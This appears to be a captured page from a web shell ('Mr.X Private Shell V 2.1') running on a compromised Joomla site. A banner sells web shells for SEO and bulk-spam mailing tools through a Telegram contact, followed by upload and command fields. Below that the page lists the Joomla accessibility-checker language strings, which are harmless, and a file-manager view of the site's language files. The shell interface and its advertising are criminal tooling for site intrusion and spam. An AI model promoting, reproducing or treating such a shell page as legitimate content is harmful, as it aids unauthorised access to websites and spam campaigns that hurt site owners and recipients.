__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
; Joomla! Project
; (C) 2021 Open Source Matters, Inc. <https://www.joomla.org>
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

PLG_SYSTEM_JOOA11Y="System - Joomla Accessibility Checker"
PLG_SYSTEM_JOOA11Y_FIELD_CHECK_ROOT="Content Container"
PLG_SYSTEM_JOOA11Y_FIELD_CHECK_ROOT_DESC="Landmark on the page that will be checked for accessibility. The default setting is the landmark <strong>main</strong>. Alternatives to landmarks are classes, elements or ARIA roles (eg #example, .example, [role=example])."
PLG_SYSTEM_JOOA11Y_FIELD_CONTAINER_IGNORE="Ignore Regions"
PLG_SYSTEM_JOOA11Y_FIELD_CONTAINER_IGNORE_DESC="Ignore specific regions within the Content Container. Use commas to separate classes or elements (eg #ignore, .ignore)."
PLG_SYSTEM_JOOA11Y_FIELD_READABILITY_ROOT="Readability Container"
PLG_SYSTEM_JOOA11Y_FIELD_READABILITY_ROOT_DESC="Landmark on the page that will be checked for readability. The default setting is the landmark <strong>main</strong>. Alternatives to landmarks are classes, elements or ARIA roles (eg #example, .example, [role=example])."
PLG_SYSTEM_JOOA11Y_FIELD_SHOW_ALWAYS="Show Always"
PLG_SYSTEM_JOOA11Y_FIELD_SHOW_ALWAYS_DESC="Load the accessiblity checker on all pages. This is useful when developing the website but should not be left on when the website is live."
PLG_SYSTEM_JOOA11Y_XML_DESCRIPTION="The Joomla Accessibility Checker visually highlights common accessibility and usability issues. Geared towards content authors, the plugin identifies errors or warnings and provides guidance on how to fix them."

;Global text
PLG_SYSTEM_JOOA11Y_ALERT_CLOSE="Close"
PLG_SYSTEM_JOOA11Y_ALERT_TEXT="Alert"
PLG_SYSTEM_JOOA11Y_CONTAINER_LABEL="Accessibility Checker"
PLG_SYSTEM_JOOA11Y_CONTRAST="Contrast"
PLG_SYSTEM_JOOA11Y_DARK_MODE="Dark Mode"
PLG_SYSTEM_JOOA11Y_ERROR="Error"
PLG_SYSTEM_JOOA11Y_FORM_LABELS="Form labels"
PLG_SYSTEM_JOOA11Y_GOOD="Good"
PLG_SYSTEM_JOOA11Y_HIDE_OUTLINE="Hide Outline"
PLG_SYSTEM_JOOA11Y_HIDE_SETTINGS="Hide Settings"
PLG_SYSTEM_JOOA11Y_LANG_CODE="en"
PLG_SYSTEM_JOOA11Y_LINKS_ADVANCED="Links (Advanced)"
PLG_SYSTEM_JOOA11Y_MAIN_TOGGLE_LABEL="Check Accessibility"
PLG_SYSTEM_JOOA11Y_OFF="Off"
PLG_SYSTEM_JOOA11Y_ON="On"
PLG_SYSTEM_JOOA11Y_PAGE_OUTLINE="Page Outline"
PLG_SYSTEM_JOOA11Y_SETTINGS="Settings"
PLG_SYSTEM_JOOA11Y_SHORTCUT_SR="Skip to issue. Keyboard shortcut: Alt period"
PLG_SYSTEM_JOOA11Y_SHORTCUT_TOOLTIP="Skip to issue"
PLG_SYSTEM_JOOA11Y_SHOW_OUTLINE="Show Outline"
PLG_SYSTEM_JOOA11Y_SHOW_SETTINGS="Show Settings"
PLG_SYSTEM_JOOA11Y_WARNING="Warning"

;Readability panel.
PLG_SYSTEM_JOOA11Y_AVG_WORD_PER_SENTENCE="Average words per sentence:"
PLG_SYSTEM_JOOA11Y_COMPLEX_WORDS="Complex words:"
PLG_SYSTEM_JOOA11Y_DIFFICULT_READABILITY="Difficult"
PLG_SYSTEM_JOOA11Y_FAIRLY_DIFFICULT_READABILITY="Fairly difficult"
PLG_SYSTEM_JOOA11Y_GOOD_READABILITY="Good"
PLG_SYSTEM_JOOA11Y_READABILITY="Readability:"
PLG_SYSTEM_JOOA11Y_TOTAL_WORDS="Words:"
PLG_SYSTEM_JOOA11Y_VERY_DIFFICULT_READABILITY="Very difficult"

;Panel status
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_BOTH="Accessibility Errors: %(errorCount). Accessibility Warnings: %(warningCount)."
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_ERRORS="Accessibility Errors: %(errorCount)."
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_HIDDEN="The item you are trying to view is not visible; it may be hidden or inside of an accordion or tab component. Here's a preview: "
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_ICON="<span class=\"jooa11y-visually-hidden\">Total issues found: </span>%(totalCount)"
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_NONE="No accessibility errors found."
PLG_SYSTEM_JOOA11Y_PANEL_STATUS_WARNINGS="Accessibility Warnings: %(warningCount)."

;Headings
PLG_SYSTEM_JOOA11Y_HEADING_EMPTY="Empty heading found! To fix, delete this line or change its format from <strong>Heading %(level)</strong> to <strong>Normal</strong> or <strong>Paragraph</strong>."
PLG_SYSTEM_JOOA11Y_HEADING_EMPTY_WITH_IMAGE="Heading has no text, but contains an image. If this is not a heading, change its format from <strong>Heading %(level)</strong> to <strong>Normal</strong> or <strong>Paragraph</strong>. Otherwise, please add alt text to the image if it is not decorative."
PLG_SYSTEM_JOOA11Y_HEADING_FIRST="The first heading on a page should usually be a Heading 1 or Heading 2. Heading 1 should be the start of the main content section, and is the main heading that describes the overall purpose of the page. Learn more about <a href=\"https://www.w3.org/WAI/tutorials/page-structure/headings/\" target=\"_blank\" rel=\"noopener noreferrer\">Heading Structure.</a>"
PLG_SYSTEM_JOOA11Y_HEADING_LONG="Heading is long! Headings should be used to organize content and convey structure. They should be brief, informative, and unique. Please keep headings less than 160 characters (no more than a sentence)."
PLG_SYSTEM_JOOA11Y_HEADING_LONG_INFO="Character Count: <strong>%(headingLength)</strong>."
PLG_SYSTEM_JOOA11Y_HEADING_MISSING_ONE="Missing Heading 1. Heading 1 should be the start of the main content area, and is the main heading that describes the overall purpose of the page. Learn more about <a href=\"https://www.w3.org/WAI/tutorials/page-structure/headings/\" target=\"_blank\" rel=\"noopener noreferrer\">Heading Structure.</a>"
PLG_SYSTEM_JOOA11Y_HEADING_NON_CONSECUTIVE_LEVEL="Non-consecutive heading level used. Headings should never skip levels, or go from <strong>Heading %(prevLevel)</strong> to <strong>Heading %(level)</strong>."
PLG_SYSTEM_JOOA11Y_PANEL_HEADING_MISSING_ONE="Missing Heading 1!"

;Link Text
PLG_SYSTEM_JOOA11Y_LINK_BEST_PRACTICES="Consider replacing the link text: <strong>%(error)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_BEST_PRACTICES_DETAILS="<ul><li>&quot;Click here&quot; places focus on mouse mechanics, when many people do not use a mouse or may be viewing this website on a mobile device. Consider using a different verb that relates to the task.</li><li>Avoid using HTML symbols as call to actions unless they are hidden to assistive technologies.</li></ul>"
PLG_SYSTEM_JOOA11Y_LINK_EMPTY="Remove empty links without any text."
PLG_SYSTEM_JOOA11Y_LINK_EMPTY_LINK_NO_LABEL="Link does not have discernable text that is visible to screen readers and other assistive technology. To fix:<ul><li>Add some concise text that describes where the link takes you.</li><li>If it is an <a href=\"https://a11y-101.com/development/icons-and-links\" target=\"_blank\" rel=\"noopener noreferrer\">icon link or SVG</a> it is likely missing a descriptive label.</li><li>If you think this link is an error due to a copy/paste bug, consider deleting it.</li></ul>"
PLG_SYSTEM_JOOA11Y_LINK_LABEL="The descriptive label for this link is: <strong>%(linkText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_STOPWORD="Link text may not be descriptive enough out of context: <strong>%(error)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_STOPWORD_TIP="<strong>Tip!</strong> Link text should always be clear, unique, and meaningful. Avoid common words like \"click here\"; or \"learn more\"."
PLG_SYSTEM_JOOA11Y_LINK_URL="Longer, less intelligible URLs used as link text might be difficult to listen to with assistive technology. In most cases, it is better to use human-readable text instead of the URL. Short URLs (such as a site's homepage) are okay."
PLG_SYSTEM_JOOA11Y_LINK_URL_TIP="<strong>Tip!</strong> Link text should always be clear, unique, and meaningful so it could be understood out of context."

;Links Advanced
PLG_SYSTEM_JOOA11Y_FILE_TYPE_WARNING="Link points to a PDF or downloadable file (e.g. MP3, Zip, Word Doc) without warning. Indicate the file type within the link text. If it is a large file, consider including the file size."
PLG_SYSTEM_JOOA11Y_FILE_TYPE_WARNING_TIP="<strong>Example:</strong> Executive Report (PDF, 3MB)"
PLG_SYSTEM_JOOA11Y_LINK_IDENTICAL_NAME="Link has identical text as another link, although it points to a different page. Multiple links with the same text may cause confusion for people who use screen readers."
PLG_SYSTEM_JOOA11Y_LINK_IDENTICAL_NAME_TIP="Consider making the following link more descriptive to help distinguish it from other links: <strong>%(linkText)</strong>"
PLG_SYSTEM_JOOA11Y_NEW_TAB_WARNING="Link opens in a new tab or window without warning. Doing so can be disorienting, especially for people who have difficulty perceiving visual content. Secondly, it is not always a good practice to control someone's experience or make decisions for them. Indicate that the link opens in a new window within the link text."
PLG_SYSTEM_JOOA11Y_NEW_TAB_WARNING_TIP="<strong>Tip!</strong> Learn best practices: <a href=\"https://www.nngroup.com/articles/new-browser-windows-and-tabs/\" target=\"_blank\" rel=\"noopener noreferrer\">opening links in new browser windows and tabs.</a>"

;Images
PLG_SYSTEM_JOOA11Y_HYPERLINK_ALT_LENGTH_MESSAGE="Alt text description on a linked image is <strong>too long</strong>. The alt text on linked images should describe where the link takes you, not a literal description of the image. <strong>Consider using the title of the page it links to as the alt text.</strong>"
PLG_SYSTEM_JOOA11Y_HYPERLINK_ALT_LENGTH_MESSAGE_INFO="The alt text is <strong>%(altLength)</strong> characters: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_IMAGE_FIGURE_DECORATIVE="Image is marked as <strong>decorative</strong> and will be ignored by assistive technology."
PLG_SYSTEM_JOOA11Y_IMAGE_FIGURE_DECORATIVE_INFO="Although a <strong>caption</strong> was provided, the image should also have alt text in most cases. <ul><li>The alt text should provide a concise description of what is in the image.</li><li>The caption should usually provide context to relate the image back to the surrounding content, or give attention to a particular piece of information.</li></ul> Learn more: <a href=\"https://thoughtbot.com/blog/alt-vs-figcaption#the-figcaption-element\" target=\"_blank\" rel=\"noopener noreferrer\">alt versus figcaption.</a>"
PLG_SYSTEM_JOOA11Y_IMAGE_FIGURE_DUPLICATE_ALT="Do not use the exact same words for both the alt and caption text. Screen readers will announce the information twice."
PLG_SYSTEM_JOOA11Y_LINK_ALT_HAS_BAD_WORD_MESSAGE="File extension within the alt text found. If the image conveys a story, mood, or important information - be sure to describe the image."
PLG_SYSTEM_JOOA11Y_LINK_ALT_HAS_BAD_WORD_MESSAGE_INFO="Remove: <strong>%(error)</strong>.<br>The alt text for this image is: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_ALT_HAS_SUS_WORD_MESSAGE="Assistive technologies already indicate that this is an image, so &quot;<strong>%(error)</strong>&quot; or &quot;%(error) of&quot; may be redundant."
PLG_SYSTEM_JOOA11Y_LINK_ALT_HAS_SUS_WORD_MESSAGE_INFO="The alt text for this image is: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_ALT_PLACEHOLDER_MESSAGE="Non-descript or placeholder alt text found. Replace the following alt text with something more meaningful: <strong>%(altText)</strong>."
PLG_SYSTEM_JOOA11Y_LINK_ALT_TOO_LONG_MESSAGE="Alt text description is <strong>too long</strong>. Alt text should be concise, yet meaningful like a <em>tweet</em> (around 100 characters). If this is a complex image or a graph, consider putting the long description of the image in the text below or an accordion component."
PLG_SYSTEM_JOOA11Y_LINK_ALT_TOO_LONG_MESSAGE_INFO="The alt text is <strong>%(altLength)</strong> characters: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_ANCHOR_LINK_AND_ALT_MESSAGE="Image link contains <strong>both alt text and surrounding link text.</strong> If this image is decorative and is being used as a functional link to another page, consider marking the image as decorative - the surrounding link text should suffice."
PLG_SYSTEM_JOOA11Y_LINK_ANCHOR_LINK_AND_ALT_MESSAGE_INFO="Alt text: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_DECORATIVE_MESSAGE="Image is marked as <strong>decorative</strong> and will be ignored by assistive technology. If the image conveys a story, mood or important information - be sure to add alt text."
PLG_SYSTEM_JOOA11Y_LINK_HYPERLINKED_IMAGE_ARIA_HIDDEN="Link around image has <span class=\"jooa11y-kbd\">aria-hidden=&quot;true&quot;</span> but is still keyboard focusable. If you are intending to hide a redundant or duplicate link, add <span class=\"jooa11y-kbd\">tabindex=&quot;-1&quot;</span> as well."
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_BAD_ALT_MESSAGE="File extension within the alt text found. Ensure the alt text describes the destination of the link, not a literal description of the image. Remove: <strong>%(error)</strong>."
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_BAD_ALT_MESSAGE_INFO="The alt text for this image is: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_LINK_ALT_TEXT_MESSAGE="Image link contains alt text, although please ensure alt text describes the destination page. <strong>Consider using the title of the page it links to as the alt text.</strong> Does the alt text describe where the link takes you?"
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_LINK_ALT_TEXT_MESSAGE_INFO="Alt text: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_LINK_NULL_ALT_NO_TEXT_MESSAGE="Image within link is marked as decorative and there is no link text. Please add alt text to the image that describes the destination of the link."
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_PLACEHOLDER_ALT_MESSAGE="Non-descript or placeholder alt text within a linked image found. Ensure the alt text describes the destination of the link, not a literal description of the image. Replace the following alt text: <strong>%(altText)</strong>."
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_SUS_ALT_MESSAGE="Assistive technologies already indicate that this is an image, so &quot;<strong>%(error)</strong>&quot; or &quot;%(error) of&quot; may be redundant. Ensure the alt text describes the destination of the link, not a literal description of the image."
PLG_SYSTEM_JOOA11Y_LINK_IMAGE_SUS_ALT_MESSAGE_INFO="The alt text for this image is: <strong>%(altText)</strong>."
PLG_SYSTEM_JOOA11Y_LINK_LINK_HAS_ALT_MESSAGE="Image is marked as decorative, although the link is using the surrounding text as a descriptive label."
PLG_SYSTEM_JOOA11Y_LINK_PASS_ALT="The alt text for this image is: <strong>%(altText)</strong>"
PLG_SYSTEM_JOOA11Y_MISSING_ALT_LINK_BUT_HAS_TEXT_MESSAGE="Image is being used as a link with surrounding text, although the alt attribute should be marked as decorative."
PLG_SYSTEM_JOOA11Y_MISSING_ALT_LINK_MESSAGE="Image is being used as a link but is missing alt text! Please ensure alt text describes where the link takes you."
PLG_SYSTEM_JOOA11Y_MISSING_ALT_MESSAGE="Missing alt text! If the image conveys a story, mood, or important information - be sure to describe the image."
PLG_SYSTEM_JOOA11Y_TEXT_UNDERLINE_WARNING="Underlined text can be confused with links."
PLG_SYSTEM_JOOA11Y_TEXT_UNDERLINE_WARNING_TIP="Consider using a different style such as &lt;em&gt;<em>emphasis</em>&lt;/em&gt;."

;Labels
PLG_SYSTEM_JOOA11Y_LABELS_ARIA_LABEL_INPUT_MESSAGE="Input has an accessible name, although please ensure there is a visible label too."
PLG_SYSTEM_JOOA11Y_LABELS_ARIA_LABEL_INPUT_MESSAGE_INFO="The accessible name for this input is: <strong>%(ariaLabel)</strong>"
PLG_SYSTEM_JOOA11Y_LABELS_INPUT_RESET_MESSAGE="Reset buttons should <strong>not</strong> be used unless specifically needed because they are easy to activate by mistake."
PLG_SYSTEM_JOOA11Y_LABELS_INPUT_RESET_MESSAGE_TIP="<strong>Tip!</strong> Learn why <a href=\"https://www.nngroup.com/articles/reset-and-cancel-buttons/\" target=\"_blank\" rel=\"noopener noreferrer\">Reset and Cancel buttons pose usability issues.</a>"
PLG_SYSTEM_JOOA11Y_LABELS_MISSING_IMAGE_INPUT_MESSAGE="Image button is missing alt text. Please add alt text to provide an accessible name. For example: <em>Search</em> or <em>Submit</em>."
PLG_SYSTEM_JOOA11Y_LABELS_MISSING_LABEL_MESSAGE="There is no label associated with this input. Please add an <span class=\"jooa11y-kbd\">id</span> to this input, and add a matching <span class=\"jooa11y-kbd\">for</span> attribute to the label."
PLG_SYSTEM_JOOA11Y_LABELS_NO_FOR_ATTRIBUTE_MESSAGE="There is no label associated with this input. Add a <span class=\"jooa11y-kbd\">for</span> attribute to the label that matches the <span class=\"jooa11y-kbd\">id</span> of this input."
PLG_SYSTEM_JOOA11Y_LABELS_NO_FOR_ATTRIBUTE_MESSAGE_INFO="The ID for this input is: <strong>id=&#34;%(t)&#34;</strong>"

;Embedded content
PLG_SYSTEM_JOOA11Y_EMBED_AUDIO="Please ensure to provide a <strong>transcript for all podcasts.</strong> Providing transcripts for audio content is a mandatory Level A requirement. Transcripts support people who are D/deaf or hard-of-hearing, but can benefit everyone. Consider placing the transcript below or within an accordion panel."
PLG_SYSTEM_JOOA11Y_EMBED_GENERAL_WARNING="Unable to check embedded content. Please make sure that images have alt text, videos have captions, text has sufficient contrast, and interactive components are <a href=\"https://webaim.org/techniques/keyboard/\" target=\"_blank\" rel=\"noopener noreferrer\">keyboard accessible.</a>"
PLG_SYSTEM_JOOA11Y_EMBED_MISSING_TITLE="Embedded content requires an accessible name that describes its contents. Please provide a unique <span class=\"jooa11y-kbd\">title</span> or <span class=\"jooa11y-kbd\">aria-label</span> attribute on the <span class=\"jooa11y-kbd\">iframe</span> element. Learn more about <a href=\"https://dequeuniversity.com/tips/provide-iframe-titles\" target=\"_blank\" rel=\"noopener noreferrer\">iFrames.</a>"
PLG_SYSTEM_JOOA11Y_EMBED_VIDEO="Please ensure <strong>all videos have closed captioning.</strong> Providing captions for all audio and video content is a mandatory Level A requirement. Captions support people who are D/deaf or hard-of-hearing."

;Contrast
PLG_SYSTEM_JOOA11Y_CONTRAST_ERROR_INPUT_MESSAGE="The text within this input does not have enough contrast with the background. The contrast ratio should be at least 4.5:1 for normal text and 3:1 for large text."
PLG_SYSTEM_JOOA11Y_CONTRAST_ERROR_INPUT_MESSAGE_INFO="The contrast ratio is <strong>%(cratio)</strong>."
PLG_SYSTEM_JOOA11Y_CONTRAST_ERROR_MESSAGE="This text does not have enough contrast with the background. The contrast ratio should be at least 4.5:1 for normal text and 3:1 for large text."
PLG_SYSTEM_JOOA11Y_CONTRAST_ERROR_MESSAGE_INFO="The contrast ratio is <strong>%(cratio)</strong> for the following text: <strong>%(nodetext)</strong>"
PLG_SYSTEM_JOOA11Y_CONTRAST_WARNING_MESSAGE="The contrast of this text is unknown and needs to be manually reviewed. Ensure the text and the background have strong contrasting colours. The contrast ratio should be at least 4.5:1 for normal text and 3:1 for large text."
PLG_SYSTEM_JOOA11Y_CONTRAST_WARNING_MESSAGE_INFO="Please review contrast of the following text:<br><strong>%(nodetext)</strong>"

;Readability
PLG_SYSTEM_JOOA11Y_READABILITY_NOT_ENOUGH_CONTENT_MESSAGE="Not enough content to calculate readability score."
PLG_SYSTEM_JOOA11Y_READABILITY_NO_P_OR_LI_MESSAGE="Unable to calculate readability score. No paragraph <span class=\"jooa11y-badge\">&lt;p&gt;</span> or list content <span class=\"jooa11y-badge\">&lt;li&gt;</span> found."

;QA
PLG_SYSTEM_JOOA11Y_QA_BAD_ITALICS="Bold and italic tags have semantic meaning, and should <strong>not</strong> be used to highlight entire paragraphs. Bolded text should be used to provide strong <strong>emphasis</strong> on a word or phrase. Italics should be used to highlight proper names (i.e. book and article titles), foreign words, quotes. Long quotes should be formatted as a blockquote."
PLG_SYSTEM_JOOA11Y_QA_BAD_LINK="Bad link found. Link appears to point to a development environment. This link points to: <strong>%(el)</strong>"
PLG_SYSTEM_JOOA11Y_QA_BLOCKQUOTE_MESSAGE="Is this a heading? <strong>%(bqHeadingText)</strong>"
PLG_SYSTEM_JOOA11Y_QA_BLOCKQUOTE_MESSAGE_TIP="Blockquotes should be used for quotes only. If this is intended to be a heading, change this blockquote to a semantic heading (e.g. Heading 2 or Heading 3)."
PLG_SYSTEM_JOOA11Y_QA_DUPLICATE_ID="Found <strong>duplicate ID</strong>. Duplicate ID errors are known to cause problems for assistive technologies when they are trying to interact with content."
PLG_SYSTEM_JOOA11Y_QA_DUPLICATE_ID_TIP="Please remove or change the following ID: <strong>%(id)</strong>"
PLG_SYSTEM_JOOA11Y_QA_FAKE_HEADING="Is this a heading? <strong>%(boldtext)</strong>"
PLG_SYSTEM_JOOA11Y_QA_FAKE_HEADING_INFO="A line of bold text might look like a heading, but someone using a screen reader cannot tell that it is important or jump to its content. Bolded text should never replace semantic headings (Heading 2 to Heading 6)."
PLG_SYSTEM_JOOA11Y_QA_PAGE_LANGUAGE_MESSAGE="Page language not declared! Please <a href=\"https://www.w3.org/International/questions/qa-html-language-declarations\" target=\"_blank\" rel=\"noopener noreferrer\">declare language on HTML tag.</a>"
PLG_SYSTEM_JOOA11Y_QA_PDF_COUNT="PDFs are considered web content and must be made accessible as well. PDFs often contain issues for people who use screen readers (missing structural tags or missing form field labels) and people who have low vision (text does not reflow when enlarged). <ul><li>If this is a form, consider using an accessible HTML form as an alternative.</li><li>If this is a document, consider converting it into a web page.</li></ul><br>Otherwise, please check <strong>%(pdfCount)</strong> <a href=\"https://www.adobe.com/accessibility/products/acrobat/using-acrobat-pro-accessibility-checker.html\" target=\"_blank\" rel=\"noopener noreferrer\">PDF(s) for accessibility in Acrobat DC.</a>"
PLG_SYSTEM_JOOA11Y_QA_SHOULD_BE_LIST="Are you trying to create a list? Possible list item found: <strong>%(firstPrefix)</strong>"
PLG_SYSTEM_JOOA11Y_QA_SHOULD_BE_LIST_TIP="Make sure to use semantic lists by using the bullet or number formatting buttons instead. When using a semantic list, assistive technologies are able to convey information such as the total number of items and the relative position of each item in the list. Learn more about <a href=\"https://www.w3.org/WAI/tutorials/page-structure/content/#lists\" target=\"_blank\" rel=\"noopener noreferrer\">semantic lists.</a>"
PLG_SYSTEM_JOOA11Y_QA_UPPERCASE_WARNING="Found all caps. Some screen readers may interpret all caps text as an acronym and will read each letter individually. Additionally, some people find all caps more difficult to read and it may give the appearance of SHOUTING."

;Tables
PLG_SYSTEM_JOOA11Y_TABLES_EMPTY_HEADING="Empty table header found! Table headers should <em>never</em> be empty. It is important to designate row and/or column headers to convey their relationship. This information provides context to people who use assistive technology. Please keep in mind that tables should be used for tabular data only."
PLG_SYSTEM_JOOA11Y_TABLES_EMPTY_HEADING_INFO="Learn more about <a href=\"https://www.w3.org/WAI/tutorials/tables/\" target=\"_blank\" rel=\"noopener noreferrer\">accessible tables.</a>"
PLG_SYSTEM_JOOA11Y_TABLES_MISSING_HEADINGS="Missing table headers! Accessible tables need HTML markup that indicates header cells and data cells which defines their relationship. This information provides context to people who use assistive technology. Tables should be used for tabular data only."
PLG_SYSTEM_JOOA11Y_TABLES_MISSING_HEADINGS_INFO="Learn more about <a href=\"https://www.w3.org/WAI/tutorials/tables/\" target=\"_blank\" rel=\"noopener noreferrer\">accessible tables.</a>"
PLG_SYSTEM_JOOA11Y_TABLES_SEMANTIC_HEADING="Semantic headings such as Heading 2 or Heading 3 should only be used for sections of content; <strong>not</strong> in HTML tables. Indicate table headings using the <strong>th</strong> element instead."
PLG_SYSTEM_JOOA11Y_TABLES_SEMANTIC_HEADING_INFO="Learn more about <a href=\"https://www.w3.org/WAI/tutorials/tables/\" target=\"_blank\" rel=\"noopener noreferrer\">accessible tables.</a>"

Filemanager

Name Type Size Permission Actions
com_actionlogs.ini File 4.59 KB 0664
com_actionlogs.sys.ini File 449 B 0664
com_admin.ini File 11.59 KB 0664
com_admin.sys.ini File 637 B 0664
com_ajax.ini File 759 B 0664
com_ajax.sys.ini File 297 B 0664
com_associations.ini File 3.32 KB 0664
com_associations.sys.ini File 334 B 0664
com_banners.ini File 12.04 KB 0664
com_banners.sys.ini File 615 B 0664
com_cache.ini File 2.82 KB 0664
com_cache.sys.ini File 517 B 0664
com_categories.ini File 5.42 KB 0664
com_categories.sys.ini File 681 B 0664
com_checkin.ini File 1.96 KB 0664
com_checkin.sys.ini File 489 B 0664
com_config.ini File 24.31 KB 0664
com_config.sys.ini File 779 B 0664
com_contact.ini File 12.04 KB 0664
com_contact.sys.ini File 1.53 KB 0664
com_content.ini File 14.11 KB 0664
com_content.sys.ini File 2.89 KB 0664
com_contenthistory.ini File 2.46 KB 0664
com_contenthistory.sys.ini File 304 B 0664
com_cpanel.ini File 6.03 KB 0664
com_cpanel.sys.ini File 433 B 0664
com_fields.ini File 6.64 KB 0664
com_fields.sys.ini File 604 B 0664
com_finder.ini File 15.09 KB 0664
com_finder.sys.ini File 1.12 KB 0664
com_guidedtours.ini File 5.32 KB 0664
com_guidedtours.sys.ini File 23.38 KB 0664
com_installer.ini File 24.04 KB 0664
com_installer.sys.ini File 1.83 KB 0664
com_joomlaupdate.ini File 25.71 KB 0664
com_joomlaupdate.sys.ini File 581 B 0664
com_languages.ini File 14.07 KB 0664
com_languages.sys.ini File 847 B 0664
com_login.ini File 518 B 0664
com_login.sys.ini File 294 B 0664
com_mails.ini File 3.04 KB 0664
com_mails.sys.ini File 298 B 0664
com_media.ini File 6.74 KB 0664
com_media.sys.ini File 441 B 0664
com_menus.ini File 12.46 KB 0664
com_menus.sys.ini File 1.28 KB 0664
com_messages.ini File 4.64 KB 0664
com_messages.sys.ini File 573 B 0664
com_modules.ini File 10.1 KB 0664
com_modules.sys.ini File 690 B 0664
com_newsfeeds.ini File 6.84 KB 0664
com_newsfeeds.sys.ini File 1.2 KB 0664
com_plugins.ini File 2.47 KB 0664
com_plugins.sys.ini File 424 B 0664
com_postinstall.ini File 983 B 0664
com_postinstall.sys.ini File 630 B 0664
com_privacy.ini File 17.26 KB 0664
com_privacy.sys.ini File 1.27 KB 0664
com_redirect.ini File 6.12 KB 0664
com_redirect.sys.ini File 303 B 0664
com_scheduler.ini File 8.88 KB 0664
com_scheduler.sys.ini File 886 B 0664
com_tags.ini File 7.97 KB 0664
com_tags.sys.ini File 1.73 KB 0664
com_templates.ini File 16.83 KB 0664
com_templates.sys.ini File 559 B 0664
com_users.ini File 34.45 KB 0664
com_users.sys.ini File 3.27 KB 0664
com_workflow.ini File 6.75 KB 0664
com_workflow.sys.ini File 669 B 0664
com_wrapper.ini File 773 B 0664
com_wrapper.sys.ini File 495 B 0664
install.xml File 648 B 0664
joomla.ini File 47.43 KB 0664
langmetadata.xml File 915 B 0664
lib_joomla.ini File 58.12 KB 0664
localise.php File 1.99 KB 0664
mod_custom.ini File 482 B 0664
mod_custom.sys.ini File 361 B 0664
mod_feed.ini File 860 B 0664
mod_feed.sys.ini File 344 B 0664
mod_frontend.ini File 422 B 0664
mod_frontend.sys.ini File 400 B 0664
mod_guidedtours.ini File 625 B 0664
mod_guidedtours.sys.ini File 324 B 0664
mod_latest.ini File 3.62 KB 0664
mod_latest.sys.ini File 363 B 0664
mod_latestactions.ini File 651 B 0664
mod_latestactions.sys.ini File 333 B 0664
mod_logged.ini File 644 B 0664
mod_logged.sys.ini File 346 B 0664
mod_login.ini File 590 B 0664
mod_login.sys.ini File 376 B 0664
mod_loginsupport.ini File 764 B 0664
mod_loginsupport.sys.ini File 409 B 0664
mod_menu.ini File 6.88 KB 0664
mod_menu.sys.ini File 345 B 0664
mod_messages.ini File 467 B 0664
mod_messages.sys.ini File 456 B 0664
mod_multilangstatus.ini File 401 B 0664
mod_multilangstatus.sys.ini File 401 B 0664
mod_popular.ini File 2.03 KB 0664
mod_popular.sys.ini File 464 B 0664
mod_post_installation_messages.ini File 447 B 0664
mod_post_installation_messages.sys.ini File 447 B 0664
mod_privacy_dashboard.ini File 356 B 0664
mod_privacy_dashboard.sys.ini File 403 B 0664
mod_privacy_status.ini File 650 B 0664
mod_privacy_status.sys.ini File 409 B 0664
mod_quickicon.ini File 4.07 KB 0664
mod_quickicon.sys.ini File 402 B 0664
mod_sampledata.ini File 826 B 0664
mod_sampledata.sys.ini File 307 B 0664
mod_stats_admin.ini File 872 B 0664
mod_stats_admin.sys.ini File 457 B 0664
mod_submenu.ini File 490 B 0664
mod_submenu.sys.ini File 330 B 0664
mod_title.ini File 296 B 0664
mod_title.sys.ini File 331 B 0664
mod_toolbar.ini File 350 B 0664
mod_toolbar.sys.ini File 387 B 0664
mod_user.ini File 494 B 0664
mod_user.sys.ini File 375 B 0664
mod_version.ini File 459 B 0664
mod_version.sys.ini File 411 B 0664
plg_actionlog_joomla.ini File 4.33 KB 0664
plg_actionlog_joomla.sys.ini File 389 B 0664
plg_api-authentication_basic.ini File 388 B 0664
plg_api-authentication_basic.sys.ini File 388 B 0664
plg_api-authentication_token.ini File 396 B 0664
plg_api-authentication_token.sys.ini File 396 B 0664
plg_authentication_cookie.ini File 1.21 KB 0664
plg_authentication_cookie.sys.ini File 545 B 0664
plg_authentication_joomla.ini File 483 B 0664
plg_authentication_joomla.sys.ini File 483 B 0664
plg_authentication_ldap.ini File 3.25 KB 0664
plg_authentication_ldap.sys.ini File 468 B 0664
plg_behaviour_compat.ini File 349 B 0664
plg_behaviour_compat.sys.ini File 349 B 0664
plg_behaviour_taggable.ini File 317 B 0664
plg_behaviour_taggable.sys.ini File 317 B 0664
